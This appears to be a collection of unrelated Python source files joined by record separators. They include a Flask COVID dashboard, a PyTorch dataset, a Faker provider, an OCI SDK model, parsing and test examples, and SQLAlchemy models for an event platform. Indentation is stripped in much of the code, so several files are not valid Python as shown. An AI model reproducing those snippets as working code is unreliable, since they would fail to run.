cont3 = content3.format(temp=weather_temp, des=weather_des, pre=weather_pre, hum=weather_hum)
content4_1 = "DATE: {date1}, NEW CASES: {new_cases1}, CUMULATIVE CASES: {cum_cases1}"
content4 = content4_1.format(date1=date1, new_cases1=new_cases1, cum_cases1=cumulative_cases1)
content4_1 = "DATE: {date2}, NEW CASES: {new_cases2}, CUMULATIVE CASES: {cum_cases2}"
content5 = content4_1.format(date2=date2, new_cases2=new_cases2, cum_cases2=cumulative_cases2)
#notifications data structure
notifications = [{"title" : title1,"content" : content1},
{"title" : title2,"content" : content2},
{"title" : title3,"content" : cont3},
{"title" : title4,"content" : content4},
{"title" : title5,"content" : content5}]
return notifications
#announcements section---------
def news():
"Extract covid related information from the news json file."
news_request()
covid_words = ['covid','lockdown',"coronavirus","covid-19"]
covid_filter ={"articles":[]}
with open('json_files/news_json.json', 'r') as file:
news_json = json.load(file, strict=False)
articles = news_json["articles"]
for article in articles:
for word in covid_words:
if word in article['title'].lower():
if {"title":article['title'], "content":article["description"]} not in covid_filter["articles"]:
covid_filter["articles"].append({"title":article['title'], "content":article["description"]})
with open('json_files/news_notifs.json', 'w') as file:
json.dump(covid_filter, file, indent=2)
file.close()
title1 = covid_filter["articles"][0]["title"]
content1 = covid_filter["articles"][0]["content"]
title2 = covid_filter["articles"][1]["title"]
content2 = covid_filter["articles"][1]["content"]
logging.info("news extracted")
return title1, content1, title2, content2
def weather():
"Extract weather information from weather json file."
weather_request()
with open('json_files/weather_json.json', 'r') as file:
weather_file = json.load(file, strict=False)
    if weather_file["cod"] != "404":
        city = weather_file["name"]
        temperature = weather_file["main"]["temp"]
        description = weather_file["weather"][0]["description"]
        pressure = weather_file["main"]["pressure"]
        humidity = weather_file["main"]["humidity"]
    else:
        # Fall back to the same error markers used by the public health helpers below.
        city = temperature = description = pressure = humidity = "ERROR-404"
    file.close()
    logging.info("weather extracted")
    return city, temperature, description, pressure, humidity
def public_health_exeter():
"Extract covid rates in Exeter from corresponding json file."
public_health_exeter_req()
with open('json_files/public_health_exeter.json', 'r') as file:
exeter_file = json.load(file, strict=False)
try:
date_yes = exeter_file["data"][0]["date"]
area_name = exeter_file["data"][0]["areaName"]
new_cases = exeter_file["data"][0]["newCasesByPublishDate"]
cumulative_cases = exeter_file["data"][0]["cumCasesByPublishDate"]
except:
logging.error("Error occurred while passing information from API")
date_yes = "ERROR-404"
area_name = "ERROR-404"
new_cases = "ERROR-404"
cumulative_cases = "ERROR-404"
file.close()
logging.info("covid rates in exeter extracted")
return date_yes, area_name, new_cases, cumulative_cases
def public_health_england():
"Extract covid rates in England from corresponding json file."
public_health_england_req()
with open('json_files/public_health_england.json', 'r') as file:
exeter_file = json.load(file, strict=False)
try:
date_yes = exeter_file["data"][0]["date"]
area_name = exeter_file["data"][0]["areaName"]
new_cases = exeter_file["data"][0]["newCasesByPublishDate"]
cumulative_cases = exeter_file["data"][0]["cumCasesByPublishDate"]
except:
logging.error("Error occurred while passing information from API")
date_yes = "ERROR-404"
area_name = "ERROR-404"
new_cases = "ERROR-404"
cumulative_cases = "ERROR-404"
file.close()
logging.info("covid rates in england extracted")
return date_yes, area_name, new_cases, cumulative_cases
#main function--------
@app.route('/index')
def main_scheduler():
"Render template and connect other functions to allow full functionality."
#access config file
with open("json_files/config.json","r") as config:
config_file = json.load(config,strict=False)
logfile = config_file["filepaths"]["logfile"]
config.close()
#create a log file to store a log of events and errors
logging.basicConfig(filename=logfile,level=logging.INFO)
s.run(blocking=False)
cancel_alarm = request.args.get("alarm_item")
#cancel alarms if the x button is pressed
if cancel_alarm:
logging.info("alarm cancelled")
with open("json_files/alarms.json","r") as file:
alarms_file = json.load(file, strict=False)
file.close()
label = cancel_alarm.replace("ALARM LABEL: ","")
#cancels alarms (removes alarm from json file)
del alarms_file["data"][label]
with open("json_files/alarms.json","w") as updated_file:
json.dump(alarms_file, updated_file, indent=2)
updated_file.close()
notifications, alarms = title_content()
storing_alarms()
#access image from config file
with open("json_files/config.json",'r') as file:
config_file = json.load(file, strict=False)
image = config_file["filepaths"]["image"]
template = config_file["filepaths"]["template"]
file.close()
return render_template(template,notifications=notifications, alarms=alarms, image=image)
if __name__ == '__main__':
app.run()
|
py | 7dfaf9f68c2362f9b3c7e341d7deeb3ed0234447 | import os
from random import random
from PIL import Image, ImageFilter
from torch.utils import data
import numpy as np
from torchvision import transforms as T
from torchvision.datasets import ImageFolder
class MyDataset(data.Dataset):
def __init__(self, root, transforms=None, train=True, test=False):
"""
        Main goal: collect the paths of all images and split the data into
        training, validation and test sets.
"""
self.test = test
# imgs = [os.path.join(root, img) for img in os.listdir(root)]
imgs = []
dataset = ImageFolder(root)
self.data_classes = dataset.classes
imgs = [dataset.imgs[i][0] for i in range(len(dataset.imgs))]
labels = [dataset.imgs[i][1] for i in range(len(dataset.imgs))]
self.imgs_num = len(imgs)
self.imgs = imgs
self.labels = labels
        # Fall back to a plain tensor conversion so __getitem__ never hits a
        # missing attribute when no transforms are supplied.
        if transforms is not None:
            self.transforms = transforms
        else:
            self.transforms = T.ToTensor()
def id_to_class(self, index):
        return self.data_classes[index]
def __getitem__(self, index):
"""
        Return the data for a single image per call.
"""
img_path = self.imgs[index]
label = self.labels[index]
img = Image.open(img_path)
aug_img = self.transforms(img)
data = aug_img
return data, label
def __len__(self):
return self.imgs_num |
py | 7dfafaded80d332f22fb0dbf0c2c631ecf384ead | import sys
poly_string = input()
alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
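# React the polymer: repeatedly delete adjacent pairs of the same letter in opposite
# cases (e.g. "aA" or "Bb") until none remain, then return the remaining length.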
def get_length(poly_string_in):
done = False
while done is False:
is_finished = True
for index in range(len(poly_string_in) - 1):
first = poly_string_in[index]
second = poly_string_in[index + 1]
if (first.lower() == second and first == second.upper()) or (first.upper() == second and first == second.lower()):
poly_string_in = poly_string_in[:index] + poly_string_in[index + 2:]
is_finished = False
break
done = is_finished
return len(poly_string_in)
# Try removing every occurrence of each letter (both cases) and keep the
# shortest fully reacted length.
shortest = 1000000000
for character in alphabet:
    print(character)
    poly_string_in = poly_string.replace(character, '')
    poly_string_in = poly_string_in.replace(character.upper(), '')
    poly_string_in_len = get_length(poly_string_in)
    if poly_string_in_len < shortest:
        shortest = poly_string_in_len
print(shortest) |
py | 7dfafdf4f88e9ced5b8295b818199662287f1702 | localized = True
from .. import BaseProvider
class Provider(BaseProvider):
formats = ('###-###-###',)
msisdn_formats = (
'#############',
)
def phone_number(self):
return self.numerify(self.random_element(self.formats))
def msisdn(self):
""" https://en.wikipedia.org/wiki/MSISDN """
return self.numerify(self.random_element(self.msisdn_formats))
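# Rough usage sketch (assumes this provider module is registered on a Faker instance):
#   from faker import Faker
#   fake = Faker()
#   fake.add_provider(Provider)
#   fake.phone_number()   # e.g. "123-456-789"
#   fake.msisdn()         # a 13-digit numeric string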
|
py | 7dfafe02c822c1c3aca18418e2a5644f4b3b4be6 | class Palindromize:
def minAdds(self, s):
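        # Append the reversed prefix s[:i] for growing i; the first result that reads
        # the same backwards is the shortest palindromic extension of s.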
        for i in range(len(s)):
r = s + s[:i][::-1]
if r == r[::-1]:
return r
|
py | 7dfafe0cb5f1b223841957690ae79fceb085fdf3 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class DisassociateMonitoredResourcesDetails(object):
"""
The information required to create new monitored resource association.
"""
def __init__(self, **kwargs):
"""
Initializes a new DisassociateMonitoredResourcesDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param compartment_id:
The value to assign to the compartment_id property of this DisassociateMonitoredResourcesDetails.
:type compartment_id: str
:param association_type:
The value to assign to the association_type property of this DisassociateMonitoredResourcesDetails.
:type association_type: str
:param source_resource_id:
The value to assign to the source_resource_id property of this DisassociateMonitoredResourcesDetails.
:type source_resource_id: str
:param destination_resource_id:
The value to assign to the destination_resource_id property of this DisassociateMonitoredResourcesDetails.
:type destination_resource_id: str
"""
self.swagger_types = {
'compartment_id': 'str',
'association_type': 'str',
'source_resource_id': 'str',
'destination_resource_id': 'str'
}
self.attribute_map = {
'compartment_id': 'compartmentId',
'association_type': 'associationType',
'source_resource_id': 'sourceResourceId',
'destination_resource_id': 'destinationResourceId'
}
self._compartment_id = None
self._association_type = None
self._source_resource_id = None
self._destination_resource_id = None
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this DisassociateMonitoredResourcesDetails.
Compartment Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The compartment_id of this DisassociateMonitoredResourcesDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this DisassociateMonitoredResourcesDetails.
Compartment Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param compartment_id: The compartment_id of this DisassociateMonitoredResourcesDetails.
:type: str
"""
self._compartment_id = compartment_id
@property
def association_type(self):
"""
Gets the association_type of this DisassociateMonitoredResourcesDetails.
Association type to be created between source and destination resources
:return: The association_type of this DisassociateMonitoredResourcesDetails.
:rtype: str
"""
return self._association_type
@association_type.setter
def association_type(self, association_type):
"""
Sets the association_type of this DisassociateMonitoredResourcesDetails.
Association type to be created between source and destination resources
:param association_type: The association_type of this DisassociateMonitoredResourcesDetails.
:type: str
"""
self._association_type = association_type
@property
def source_resource_id(self):
"""
Gets the source_resource_id of this DisassociateMonitoredResourcesDetails.
Source Monitored Resource Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The source_resource_id of this DisassociateMonitoredResourcesDetails.
:rtype: str
"""
return self._source_resource_id
@source_resource_id.setter
def source_resource_id(self, source_resource_id):
"""
Sets the source_resource_id of this DisassociateMonitoredResourcesDetails.
Source Monitored Resource Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param source_resource_id: The source_resource_id of this DisassociateMonitoredResourcesDetails.
:type: str
"""
self._source_resource_id = source_resource_id
@property
def destination_resource_id(self):
"""
Gets the destination_resource_id of this DisassociateMonitoredResourcesDetails.
Destination Monitored Resource Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The destination_resource_id of this DisassociateMonitoredResourcesDetails.
:rtype: str
"""
return self._destination_resource_id
@destination_resource_id.setter
def destination_resource_id(self, destination_resource_id):
"""
Sets the destination_resource_id of this DisassociateMonitoredResourcesDetails.
Destination Monitored Resource Identifier `OCID`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param destination_resource_id: The destination_resource_id of this DisassociateMonitoredResourcesDetails.
:type: str
"""
self._destination_resource_id = destination_resource_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
py | 7dfafe85b15cd14253ad76b506377573823385c0 | #
# simpleArith.py
#
# Example of defining an arithmetic expression parser using
# the infixNotation helper method in mo_parsing.
#
# Copyright 2006, by Paul McGuire
#
from mo_parsing import *
integer = Word(nums).add_parse_action(lambda t: int(t[0]))
variable = Word(alphas, exact=1)
operand = integer | variable
expop = Literal("^")
signop = one_of("+ -")
multop = one_of("* /")
plusop = one_of("+ -")
factop = Literal("!")
# To use the infixNotation helper:
# 1. Define the "atom" operand term of the grammar.
# For this simple grammar, the smallest operand is either
# and integer or a variable. This will be the first argument
# to the infixNotation method.
# 2. Define a list of tuples for each level of operator
# precendence. Each tuple is of the form
# (op_expr, numTerms, rightLeftAssoc, parse_action), where
# - op_expr is the mo_parsing expression for the operator;
# may also be a string, which will be converted to a Literal
# - numTerms is the number of terms for this operator (must
# be 1 or 2)
# - rightLeftAssoc is the indicator whether the operator is
# right or left associative, using the mo_parsing-defined
# constants RIGHT_ASSOC and LEFT_ASSOC.
# - parse_action is the parse action to be associated with
# expressions matching this operator expression (the
# parse action tuple member may be omitted)
# 3. Call infixNotation passing the operand expression and
# the operator precedence list, and save the returned value
# as the generated mo_parsing expression. You can then use
# this expression to parse input strings, or incorporate it
# into a larger, more complex grammar.
#
expr = infix_notation(
operand,
[
("!", 1, LEFT_ASSOC),
("^", 2, RIGHT_ASSOC),
(signop, 1, RIGHT_ASSOC),
(multop, 2, LEFT_ASSOC),
(plusop, 2, LEFT_ASSOC),
],
)
test = [
"9 + 2 + 3",
"9 + 2 * 3",
"(9 + 2) * 3",
"(9 + -2) * 3",
"(9 + -2) * 3^2^2",
"(9! + -2) * 3^2^2",
"M*X + B",
"M*(X + B)",
"1+2*-3^4*5+-+-6",
]
for t in test:
    # Assumption: mo_parsing exposes parse_string() (the snake_case counterpart of
    # pyparsing's parseString); adjust the call if your version differs.
    print(t, "->", expr.parse_string(t))
|
py | 7dfafe8c292e0536f80922270586ce28810361d7 | import os
import bspump.declarative
import bspump.unittest
class TestDeclarativeAdd(bspump.unittest.TestCase):
def setUp(self) -> None:
super().setUp()
self.Builder = bspump.declarative.ExpressionBuilder(self.App)
def load(self, decl_fname):
basedir = os.path.dirname(__file__)
with open(os.path.join(basedir, decl_fname), 'r') as f:
return self.Builder.parse(f.read())[0]
def test_add_01(self):
event = {
'string1': "STRING1",
'string2': "STRING2",
}
decl = self.load('./test_add_01.yaml')
res = decl({}, event)
self.assertEqual(res, "STRING1STRING2")
def test_add_02(self):
decl = self.load('./test_add_02.yaml')
res = decl({}, {})
self.assertEqual(res, 3)
bspump.declarative.declaration_to_dot(decl, './test_add_02.dot')
|
py | 7dfafee8f9910b7637cd9f6cbe89a2287b184712 | from pandas_profiling.report.presentation.core import FrequencyTableSmall
from pandas_profiling.report.presentation.flavours.html import templates
class HTMLFrequencyTableSmall(FrequencyTableSmall):
def render(self):
return templates.template("frequency_table_small.html").render(
rows=self.content
)
|
py | 7dfaff389454ade8b88f05482fe543582b29a997 | import datetime
import time
from enum import IntEnum
from authlib.integrations.sqla_oauth2 import (
OAuth2AuthorizationCodeMixin,
OAuth2ClientMixin,
OAuth2TokenMixin,
)
from dateutil.relativedelta import relativedelta
from flask import request
from flask_dance.consumer.storage.sqla import OAuthConsumerMixin
from flask_security import RoleMixin, UserMixin, current_user
from geoalchemy2 import Geometry
from sqlalchemy import (
Boolean,
Column,
DateTime,
ForeignKey,
Integer,
Numeric,
String,
Unicode,
UnicodeText,
UniqueConstraint,
and_,
func,
select,
)
from sqlalchemy.event import listens_for
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.orm import aliased, backref, deferred, object_session, relationship
from sqlalchemy.orm.relationships import remote
from sqlalchemy.schema import CheckConstraint
from sqlalchemy.sql.operators import op
from sqlalchemy_utils import ColorType
from project import db
from project.dateutils import gmt_tz
from project.dbtypes import IntegerEnum
from project.utils import make_check_violation
# Base
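# Builds a weighted PostgreSQL tsvector expression (German text-search configuration)
# from (column, weight) pairs by chaining setweight(to_tsvector(...)) terms with ||.
# EventMixin uses it below to define its full-text search vector.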
def create_tsvector(*args):
field, weight = args[0]
exp = func.setweight(func.to_tsvector("german", func.coalesce(field, "")), weight)
for field, weight in args[1:]:
exp = op(
exp,
"||",
func.setweight(
func.to_tsvector("german", func.coalesce(field, "")), weight
),
)
return exp
def _current_user_id_or_none():
if current_user and current_user.is_authenticated:
return current_user.id
return None
class TrackableMixin(object):
@declared_attr
def created_at(cls):
return deferred(
Column(DateTime, default=datetime.datetime.utcnow), group="trackable"
)
@declared_attr
def updated_at(cls):
return deferred(
Column(
DateTime,
default=datetime.datetime.utcnow,
onupdate=datetime.datetime.utcnow,
),
group="trackable",
)
@declared_attr
def created_by_id(cls):
return deferred(
Column(
"created_by_id",
ForeignKey("user.id"),
default=_current_user_id_or_none,
),
group="trackable",
)
@declared_attr
def created_by(cls):
return relationship(
"User",
primaryjoin="User.id == %s.created_by_id" % cls.__name__,
remote_side="User.id",
)
@declared_attr
def updated_by_id(cls):
return deferred(
Column(
"updated_by_id",
ForeignKey("user.id"),
default=_current_user_id_or_none,
onupdate=_current_user_id_or_none,
),
group="trackable",
)
@declared_attr
def updated_by(cls):
return relationship(
"User",
primaryjoin="User.id == %s.updated_by_id" % cls.__name__,
remote_side="User.id",
)
# Global
class Settings(db.Model, TrackableMixin):
__tablename__ = "settings"
id = Column(Integer(), primary_key=True)
tos = Column(UnicodeText())
legal_notice = Column(UnicodeText())
contact = Column(UnicodeText())
privacy = Column(UnicodeText())
# Multi purpose
class Image(db.Model, TrackableMixin):
__tablename__ = "image"
id = Column(Integer(), primary_key=True)
data = deferred(db.Column(db.LargeBinary))
encoding_format = Column(String(80))
copyright_text = Column(Unicode(255))
def is_empty(self):
return not self.data
def get_hash(self):
return (
int(self.updated_at.replace(tzinfo=gmt_tz).timestamp() * 1000)
if self.updated_at
else 0
)
# User
class RolesUsers(db.Model):
__tablename__ = "roles_users"
id = Column(Integer(), primary_key=True)
user_id = Column("user_id", Integer(), ForeignKey("user.id"))
role_id = Column("role_id", Integer(), ForeignKey("role.id"))
class Role(db.Model, RoleMixin):
__tablename__ = "role"
id = Column(Integer(), primary_key=True)
name = Column(String(80), unique=True)
title = Column(Unicode(255))
description = Column(String(255))
permissions = Column(UnicodeText())
class User(db.Model, UserMixin):
__tablename__ = "user"
id = Column(Integer, primary_key=True)
email = Column(String(255), unique=True)
username = Column(String(255))
password = Column(String(255))
last_login_at = Column(DateTime())
current_login_at = Column(DateTime())
last_login_ip = Column(String(100))
current_login_ip = Column(String(100))
login_count = Column(Integer)
active = Column(Boolean())
fs_uniquifier = Column(String(255))
confirmed_at = Column(DateTime())
roles = relationship(
"Role", secondary="roles_users", backref=backref("users", lazy="dynamic")
)
def get_user_id(self):
return self.id
# OAuth consumer: used when we consume OAuth and a user wants to sign in via Google or Facebook
class OAuth(OAuthConsumerMixin, db.Model):
provider_user_id = Column(String(256), unique=True, nullable=False)
user_id = Column(Integer(), ForeignKey("user.id"), nullable=False)
user = db.relationship("User")
# OAuth server: we offer users the option to sign in to our site via OAuth2
class OAuth2Client(db.Model, OAuth2ClientMixin):
__tablename__ = "oauth2_client"
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey("user.id", ondelete="CASCADE"))
user = db.relationship("User")
@OAuth2ClientMixin.grant_types.getter
def grant_types(self):
return ["authorization_code", "refresh_token"]
@OAuth2ClientMixin.response_types.getter
def response_types(self):
return ["code"]
@OAuth2ClientMixin.token_endpoint_auth_method.getter
def token_endpoint_auth_method(self):
return ["client_secret_basic", "client_secret_post", "none"]
def check_redirect_uri(self, redirect_uri):
if redirect_uri.startswith(request.host_url): # pragma: no cover
return True
return super().check_redirect_uri(redirect_uri)
def check_token_endpoint_auth_method(self, method):
return method in self.token_endpoint_auth_method
class OAuth2AuthorizationCode(db.Model, OAuth2AuthorizationCodeMixin):
__tablename__ = "oauth2_code"
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey("user.id", ondelete="CASCADE"))
user = db.relationship("User")
class OAuth2Token(db.Model, OAuth2TokenMixin):
__tablename__ = "oauth2_token"
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey("user.id", ondelete="CASCADE"))
user = db.relationship("User")
@property
def client(self):
return (
object_session(self)
.query(OAuth2Client)
.filter(OAuth2Client.client_id == self.client_id)
.first()
)
def is_refresh_token_active(self):
if self.revoked:
return False
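        # The refresh token is treated as usable for twice the access token lifetime.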
expires_at = self.issued_at + self.expires_in * 2
return expires_at >= time.time()
# Admin Unit
class AdminUnitMemberRolesMembers(db.Model):
__tablename__ = "adminunitmemberroles_members"
id = Column(Integer(), primary_key=True)
member_id = Column("member_id", Integer(), ForeignKey("adminunitmember.id"))
role_id = Column("role_id", Integer(), ForeignKey("adminunitmemberrole.id"))
class AdminUnitMemberRole(db.Model, RoleMixin):
__tablename__ = "adminunitmemberrole"
id = Column(Integer(), primary_key=True)
name = Column(String(80), unique=True)
title = Column(Unicode(255))
description = Column(String(255))
permissions = Column(UnicodeText())
class AdminUnitMember(db.Model):
__tablename__ = "adminunitmember"
id = Column(Integer(), primary_key=True)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey("user.id"), nullable=False)
user = db.relationship("User", backref=db.backref("adminunitmembers", lazy=True))
roles = relationship(
"AdminUnitMemberRole",
secondary="adminunitmemberroles_members",
order_by="AdminUnitMemberRole.id",
backref=backref("members", lazy="dynamic"),
)
class AdminUnitMemberInvitation(db.Model):
__tablename__ = "adminunitmemberinvitation"
__table_args__ = (UniqueConstraint("email", "admin_unit_id"),)
id = Column(Integer(), primary_key=True)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
email = Column(String(255))
roles = Column(UnicodeText())
class AdminUnitInvitation(db.Model, TrackableMixin):
__tablename__ = "adminunitinvitation"
id = Column(Integer(), primary_key=True)
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=False)
email = Column(String(255), nullable=False)
admin_unit_name = Column(String(255))
relation_auto_verify_event_reference_requests = Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
relation_verify = Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
class AdminUnitRelation(db.Model, TrackableMixin):
__tablename__ = "adminunitrelation"
__table_args__ = (
UniqueConstraint("source_admin_unit_id", "target_admin_unit_id"),
CheckConstraint("source_admin_unit_id != target_admin_unit_id"),
)
id = Column(Integer(), primary_key=True)
source_admin_unit_id = db.Column(
db.Integer, db.ForeignKey("adminunit.id", ondelete="CASCADE"), nullable=False
)
target_admin_unit_id = db.Column(
db.Integer, db.ForeignKey("adminunit.id", ondelete="CASCADE"), nullable=False
)
auto_verify_event_reference_requests = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
verify = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
invited = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
def validate(self):
source_id = (
self.source_admin_unit.id
if self.source_admin_unit
else self.source_admin_unit_id
)
target_id = (
self.target_admin_unit.id
if self.target_admin_unit
else self.target_admin_unit_id
)
if source_id == target_id:
raise make_check_violation("There must be no self-reference.")
@listens_for(AdminUnitRelation, "before_insert")
@listens_for(AdminUnitRelation, "before_update")
def before_saving_admin_unit_relation(mapper, connect, self):
self.validate()
class AdminUnit(db.Model, TrackableMixin):
__tablename__ = "adminunit"
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255), unique=True)
short_name = Column(Unicode(100), unique=True)
members = relationship(
"AdminUnitMember",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
invitations = relationship(
"AdminUnitMemberInvitation",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
admin_unit_invitations = relationship(
"AdminUnitInvitation",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
events = relationship(
"Event", cascade="all, delete-orphan", backref=backref("admin_unit", lazy=True)
)
eventsuggestions = relationship(
"EventSuggestion",
cascade="all, delete-orphan",
backref=backref("admin_unit", lazy=True),
)
references = relationship(
"EventReference",
cascade="all, delete-orphan",
backref=backref("admin_unit", lazy=True),
)
reference_requests = relationship(
"EventReferenceRequest",
cascade="all, delete-orphan",
backref=backref("admin_unit", lazy=True),
)
event_organizers = relationship(
"EventOrganizer",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
event_places = relationship(
"EventPlace",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
event_lists = relationship(
"EventList",
cascade="all, delete-orphan",
backref=backref("adminunit", lazy=True),
)
location_id = deferred(db.Column(db.Integer, db.ForeignKey("location.id")))
location = db.relationship(
"Location", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
logo_id = deferred(db.Column(db.Integer, db.ForeignKey("image.id")))
logo = db.relationship(
"Image", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
url = deferred(Column(String(255)), group="detail")
email = deferred(Column(Unicode(255)), group="detail")
phone = deferred(Column(Unicode(255)), group="detail")
fax = deferred(Column(Unicode(255)), group="detail")
widget_font = deferred(Column(Unicode(255)), group="widget")
widget_background_color = deferred(Column(ColorType), group="widget")
widget_primary_color = deferred(Column(ColorType), group="widget")
widget_link_color = deferred(Column(ColorType), group="widget")
incoming_reference_requests_allowed = deferred(Column(Boolean()))
suggestions_enabled = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
can_create_other = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
can_verify_other = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
can_invite_other = deferred(
Column(
Boolean(),
nullable=False,
default=False,
server_default="0",
)
)
outgoing_relations = relationship(
"AdminUnitRelation",
primaryjoin=remote(AdminUnitRelation.source_admin_unit_id) == id,
single_parent=True,
cascade="all, delete-orphan",
passive_deletes=True,
backref=backref(
"source_admin_unit",
lazy=True,
),
)
incoming_relations = relationship(
"AdminUnitRelation",
primaryjoin=remote(AdminUnitRelation.target_admin_unit_id) == id,
cascade="all, delete-orphan",
passive_deletes=True,
backref=backref(
"target_admin_unit",
lazy=True,
),
)
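    # is_verified works both on loaded instances (plain Python any()) and inside queries,
    # where the expression below counts verifying relations coming from admin units that
    # are allowed to verify others.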
@hybrid_property
def is_verified(self):
if not self.incoming_relations:
return False
return any(
r.verify and r.source_admin_unit.can_verify_other
for r in self.incoming_relations
)
@is_verified.expression
def is_verified(cls):
SourceAdminUnit = aliased(AdminUnit)
j = AdminUnitRelation.__table__.join(
SourceAdminUnit,
AdminUnitRelation.source_admin_unit_id == SourceAdminUnit.id,
)
return (
select([func.count()])
.select_from(j)
.where(
and_(
AdminUnitRelation.verify,
AdminUnitRelation.target_admin_unit_id == cls.id,
SourceAdminUnit.can_verify_other,
)
)
.as_scalar()
> 0
)
def purge(self):
if self.logo and self.logo.is_empty():
self.logo_id = None
@listens_for(AdminUnit, "before_insert")
@listens_for(AdminUnit, "before_update")
def before_saving_admin_unit(mapper, connect, self):
self.purge()
@listens_for(AdminUnit.can_invite_other, "set")
def set_admin_unit_can_invite_other(target, value, oldvalue, initiator):
if (
not value
and target.admin_unit_invitations
and len(target.admin_unit_invitations) > 0
):
target.admin_unit_invitations = []
# Universal Types
class Location(db.Model, TrackableMixin):
__tablename__ = "location"
id = Column(Integer(), primary_key=True)
street = Column(Unicode(255))
postalCode = Column(Unicode(255))
city = Column(Unicode(255))
state = Column(Unicode(255))
country = Column(Unicode(255))
latitude = Column(Numeric(18, 16))
longitude = Column(Numeric(19, 16))
coordinate = Column(Geometry(geometry_type="POINT"))
def __init__(self, **kwargs):
super(Location, self).__init__(**kwargs)
def is_empty(self):
return (
not self.street
and not self.postalCode
and not self.city
and not self.state
and not self.country
and not self.latitude
and not self.longitude
)
def update_coordinate(self):
if self.latitude and self.longitude:
point = "POINT({} {})".format(self.longitude, self.latitude)
self.coordinate = point
else:
self.coordinate = None
@classmethod
def update_coordinates(cls):
        locations = Location.query.filter(
            and_(
                Location.latitude.isnot(None),
                Location.latitude != 0,
                Location.coordinate.is_(None),
            )
        ).all()
for location in locations: # pragma: no cover
location.update_coordinate()
db.session.commit()
@listens_for(Location, "before_insert")
@listens_for(Location, "before_update")
def update_location_coordinate(mapper, connect, self):
self.update_coordinate()
# Events
class EventPlace(db.Model, TrackableMixin):
__tablename__ = "eventplace"
__table_args__ = (UniqueConstraint("name", "admin_unit_id"),)
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255), nullable=False)
location_id = db.Column(db.Integer, db.ForeignKey("location.id"))
location = db.relationship(
"Location", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
photo_id = db.Column(db.Integer, db.ForeignKey("image.id"))
photo = db.relationship(
"Image", uselist=False, single_parent=True, cascade="all, delete-orphan"
)
url = Column(String(255))
description = Column(UnicodeText())
admin_unit_id = db.Column(db.Integer, db.ForeignKey("adminunit.id"), nullable=True)
@listens_for(EventPlace, "before_insert")
@listens_for(EventPlace, "before_update")
def purge_event_place(mapper, connect, self):
if self.location and self.location.is_empty():
self.location_id = None
if self.photo and self.photo.is_empty():
self.photo_id = None
class EventCategory(db.Model):
__tablename__ = "eventcategory"
id = Column(Integer(), primary_key=True)
name = Column(Unicode(255), nullable=False, unique=True)
class EventTargetGroupOrigin(IntEnum):
both = 1
tourist = 2
resident = 3
class EventAttendanceMode(IntEnum):
offline = 1
online = 2
mixed = 3
class EventStatus(IntEnum):
scheduled = 1
cancelled = 2
movedOnline = 3
postponed = 4
rescheduled = 5
class EventReviewStatus(IntEnum):
inbox = 1
verified = 2
rejected = 3
class EventRejectionReason(IntEnum):
duplicate = 1
untrustworthy = 2
illegal = 3
class EventReferenceRequestReviewStatus(IntEnum):
inbox = 1
verified = 2
rejected = 3
class EventReferenceRequestRejectionReason(IntEnum):
duplicate = 1
untrustworthy = 2
illegal = 3
irrelevant = 4
class PublicStatus(IntEnum):
draft = 1
published = 2
class EventOrganizer(db.Model, TrackableMixin):
__tablename__ = "eventorganizer"
__table_args__ = (UniqueConstraint("name", "admin_unit_id"),)
